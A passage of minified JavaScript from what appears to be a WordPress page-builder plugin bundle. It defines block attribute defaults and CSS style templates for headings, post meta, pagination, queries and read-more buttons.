a:hover"}]},catSacing:{type:"object",default:{lg:{top:5,bottom:5,left:0,right:0,unit:"px"}},style:[{depends:[{key:"catShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-category-grid { margin:{{catSacing}}; }"}]},catPadding:{type:"object",default:{lg:{top:3,bottom:3,left:7,right:7,unit:"px"}},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a { padding:{{catPadding}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a { padding:{{catPadding}}; }"}]}}},92165:(e,t,l)=>{"use strict";l.d(t,{t:()=>u});var o=l(36557),a=l(35752),i=l(78785),n=l(450),r=l(10733),s=l(13946),p=l(50060),c=l(22886);function u(e,t,l){let u={};const d={meta:n.Z,query:s.Z,video:c.Z,heading:i.Z,category:a.Z,readMore:p.Z,pagination:r.Z,advanceAttr:o.Z,advFilter:{querySearch:{type:"string",default:""},advFilterEnable:{type:"boolean",default:!1},advPaginationEnable:{type:"boolean",default:!1},defQueryTax:{type:"object",default:{}},advRelation:{type:"string",default:"AND"}},pagiBlockCompatibility:{loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]}}};return e?.length>0&&e.forEach((function(e){d[e]?u={...u,...JSON.parse(JSON.stringify(d[e]))}:console.log(e," - This Section not found in Dynamic attr store")})),t?.length>0&&t.forEach((function(e,t){delete u[e]})),l&&l.length>0&&l.forEach((function(e){u[e.key]&&(e?.default||e?.style)?(e?.default&&u[e.key]&&(u[e.key].default=e?.default),e?.style&&(u[e.key].style=e?.style)):console.log(e.key," - This key not found in Dynamic attr store",e?.default)})),u}},78785:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});const o={headingURL:{type:"string",default:""},headingBtnText:{type:"string",default:"View More",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}]}]},headingStyle:{type:"string",default:"style1"},headingTag:{type:"string",default:"h2"},headingAlign:{type:"string",default:"left",style:[{selector:"{{ULTP}} .ultp-heading-inner, \n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; }"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-inner"}]},headingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-heading-inner span { color:{{headingColor}}; }"}]},headingBorderBottomColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n            {{ULTP}} .ultp-heading-inner span:after { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:before { border-color:{{headingBorderBottomColor}}; }"}]},headingBorderBottomColor2:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"}]},headingBg:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-style5 .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n            {{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; \n            }"},{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span,\n            {{ULTP}} .ultp-heading-inner span:after { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n            {{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"}]},headingBg2:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg2}}; }"}]},headingBtnTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn"}]},headingBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn { color:{{headingBtnColor}}; } \n            {{ULTP}} .ultp-heading-wrap .ultp-heading-btn svg { color:{{headingBtnColor}}; }"}]},headingBtnHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover { color:{{headingBtnHoverColor}}; } \n            {{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover svg { color:{{headingBtnHoverColor}}; }"}]},headingBorder:{type:"string",default:"3",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n            {{ULTP}} .ultp-heading-inner span:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"}]},headingSpacing:{type:"object",default:{lg:20,sm:10,unit:"px"},style:[{selector:"{{ULTP}} .ultp-heading-wrap {margin-top:0; margin-bottom:{{headingSpacing}}; }"}]},headingRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"}]},headingPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"}]},subHeadingShow:{type:"boolean",default:!1},subHeadingText:{type:"string",default:"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer ut sem augue. Sed at felis ut enim dignissim sodales.",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},subHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div { color:{{subHeadingColor}}; }"}]},subHeadingSpacing:{type:"object",default:{lg:{top:"8",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { margin:{{subHeadingSpacing}}; }"}]},enableWidth:{type:"toggle",default:!1,style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},customWidth:{type:"object",default:{lg:{top:"",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0},{key:"enableWidth",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { max-width:{{customWidth}}; }"}]}};!function e(t,l){const o=[];for(const a in t)a in l?"object"==typeof t[a]&&"object"==typeof l[a]?e(t[a],l[a]).length>0&&o.push(a):t[a]!==l[a]&&o.push(a):o.push(a);for(const e in l)e in t||o.push(e);return o}(o,{});const a=o},450:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={metaShow:{type:"boolean",default:!0},metaPosition:{type:"string",default:"top"},metaStyle:{type:"string",default:"icon"},authorLink:{type:"boolean",default:!0},metaSeparator:{type:"string",default:"dot"},metaList:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},metaMinText:{type:"string",default:"min read"},metaAuthorPrefix:{type:"string",default:"By"},metaDateFormat:{type:"string",default:"M j, Y"},metaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",decoration:"none",family:""},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element, \n            {{ULTP}} .ultp-block-item span.ultp-block-meta-element a"}]},metaColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element svg { color: {{metaColor}}; } \n                {{ULTP}} span.ultp-block-meta-element,\n                {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element a { color: {{metaColor}}; }"}]},metaHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element:hover, \n            {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:hover a { color: {{metaHoverColor}}; } \n            {{ULTP}} span.ultp-block-meta-element:hover svg { color: {{metaHoverColor}}; }"}]},metaSeparatorColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta-dot span:after { background:{{metaSeparatorColor}}; } \n        {{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:after { color:{{metaSeparatorColor}}; }"}]},metaSpacing:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} span.ultp-block-meta-element { margin-right:{{metaSpacing}}; } \n            {{ULTP}} span.ultp-block-meta-element { padding-left: {{metaSpacing}}; } \n            .rtl {{ULTP}} span.ultp-block-meta-element {margin-right:0; margin-left:{{metaSpacing}}; } \n            .rtl {{ULTP}} span.ultp-block-meta-element { padding-left:0; padding-right: {{metaSpacing}}; }"},{depends:[{key:"metaShow",condition:"==",value:!0},{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-items-wrap span.ultp-block-meta-element:last-child { margin-right:0px; }"}]},metaMargin:{type:"object",default:{lg:{top:"5",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { margin:{{metaMargin}}; }"}]},metaPadding:{type:"object",default:{lg:{top:"5",bottom:"5",left:"",right:"",unit:"px"}},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { padding:{{metaPadding}}; }"}]},metaBorder:{type:"object",default:{openBorder:0,width:{top:1,right:"0",bottom:"0",left:"0"},color:"#009fd4",type:"solid"},style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta"}]},metaBg:{type:"string",default:"",style:[{depends:[{key:"metaShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-meta { background:{{metaBg}}; }"}]}}},10733:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationNav:{type:"string",default:"textArrow",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},navPosition:{type:"string",default:"topRight",style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}]}]},pagiAlign:{type:"object",default:{lg:"center"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-loadmore, \n            {{ULTP}} .ultp-next-prev-wrap ul, \n            {{ULTP}} .ultp-pagination, \n            {{ULTP}} .ultp-pagination-wrap { text-align:{{pagiAlign}}; }"}]},pagiTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a, \n            {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiArrowSize:{type:"object",default:{lg:"14"},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a svg { width:{{pagiArrowSize}}px; }"}]},pagiColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a,\n                {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a,\n                {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action { color:{{pagiColor}}; }\n                {{ULTP}} .ultp-pagination svg,\n                {{ULTP}} .ultp-next-prev-wrap ul li a svg,\n                {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action svg { color:{{pagiColor}}; }"}]},pagiBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore .ultp-loadmore-action"}]},pagiBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a,\n            {{ULTP}} .ultp-next-prev-wrap ul li a,\n            {{ULTP}} .ultp-loadmore-action"}]},pagiShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a,\n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action"}]},pagiRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action { border-radius:{{pagiRadius}}; }"}]},pagiHoverColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-next-prev-wrap ul li a:hover,\n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a,\n            {{ULTP}} .ultp-block-wrapper .ultp-loadmore-action:hover { color:{{pagiHoverColor}}; } \n            {{ULTP}} .ultp-pagination li a:hover svg,\n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover svg, \n            {{ULTP}} .ultp-block-wrapper .ultp-loadmore .ultp-loadmore-action:hover svg { color:{{pagiHoverColor}}; } \n            @media (min-width: 768px) { \n                {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover { color:{{pagiHoverColor}};}\n            }"}]},pagiHoverbg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)",replace:1},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-pagination-wrap .ultp-pagination li a:focus, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover{ {{pagiHoverbg}} }"}]},pagiHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-pagination li.pagination-active a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover"}]},pagiHoverRadius:{type:"object",default:{lg:{top:"2",bottom:"2",left:"2",right:"2",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li.pagination-active a,\n            {{ULTP}} .ultp-pagination li a:hover, \n            {{ULTP}} .ultp-next-prev-wrap ul li a:hover, \n            {{ULTP}} .ultp-loadmore-action:hover { border-radius:{{pagiHoverRadius}}; }"}]},pagiPadding:{type:"object",default:{lg:{top:"8",bottom:"8",left:"14",right:"14",unit:"px"}},style:[{depends:[{key:"paginationShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-pagination li a, \n            {{ULTP}} .ultp-next-prev-wrap ul li a, \n            {{ULTP}} .ultp-loadmore-action { padding:{{pagiPadding}}; }"}]},navMargin:{type:"object",default:{lg:{top:"0",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"==",value:"navigation"}],selector:"{{ULTP}} .ultp-next-prev-wrap ul { margin:{{navMargin}}; }"}]},pagiMargin:{type:"object",default:{lg:{top:"35",right:"0",bottom:"0",left:"0",unit:"px"}},style:[{depends:[{key:"paginationType",condition:"!=",value:"navigation"}],selector:"{{ULTP}} .ultp-pagination-wrap .ultp-pagination, \n            {{ULTP}} .ultp-loadmore { margin:{{pagiMargin}}; }"}]}}},13946:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={queryQuick:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryPostType:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"==",value:"customPostType"}]}]},queryNumPosts:{type:"object",default:{lg:6}},queryNumber:{type:"string",default:4,style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryType:{type:"string",default:"post"},queryTax:{type:"string",default:"category",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryTaxValue:{type:"string",default:"[]",style:[{depends:[{key:"queryTax",condition:"!=",value:""},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryRelation:{type:"string",default:"OR",style:[{depends:[{key:"queryTaxValue",condition:"!=",value:"[]"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOrderBy:{type:"string",default:"date"},metaKey:{type:"string",default:"custom_meta_key",style:[{depends:[{key:"queryOrderBy",condition:"==",value:"meta_value_num"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOrder:{type:"string",default:"desc"},queryInclude:{type:"string",default:""},queryExclude:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryOffset:{type:"string",default:"0",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryExcludeTerm:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryExcludeAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},querySticky:{type:"boolean",default:!0,style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},queryUnique:{type:"string",default:"",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts"]}]}]},queryPosts:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"==",value:"posts"}]}]},queryCustomPosts:{type:"string",default:"[]",style:[{depends:[{key:"queryType",condition:"==",value:"customPosts"}]}]}}},50060:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={readMore:{type:"boolean",default:!1},readMoreText:{type:"string",default:""},readMoreIcon:{type:"string",default:"rightArrowLg"},readMoreTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:1,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-readmore a"}]},readMoreIconSize:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore svg { width:{{readMoreIconSize}}; }"}]},readMoreColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-readmore a { color:{{readMoreColor}}; } \n            {{ULTP}} .ultp-block-readmore a svg { fill:{{readMoreColor}}; }"}]},readMoreBgColor:{type:"object",default:{openColor:0,type:"color",color:"#000"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a"}]},readMoreBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a"}]},readMoreRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"readMore",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-readmore a { border-radius:{{readMoreRadius}}; 